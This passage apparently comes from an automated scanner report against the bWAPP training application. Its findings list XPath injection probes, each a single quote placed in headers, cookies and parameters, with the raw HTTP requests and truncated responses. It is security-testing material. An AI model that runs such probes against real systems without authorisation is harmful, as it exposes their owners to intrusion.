<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.2. http://192.168.52.147/bWAPP/ [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.3. http://192.168.52.147/bWAPP/ [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:27 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.4. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.5. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.6. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:50 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.7. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.8. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.9. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.10. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.11. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.12. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:27 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.13. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.14. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.15. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13481

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.16. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [top_security_nossl cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.17. http://192.168.52.147/bWAPP/ba_forgotten.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
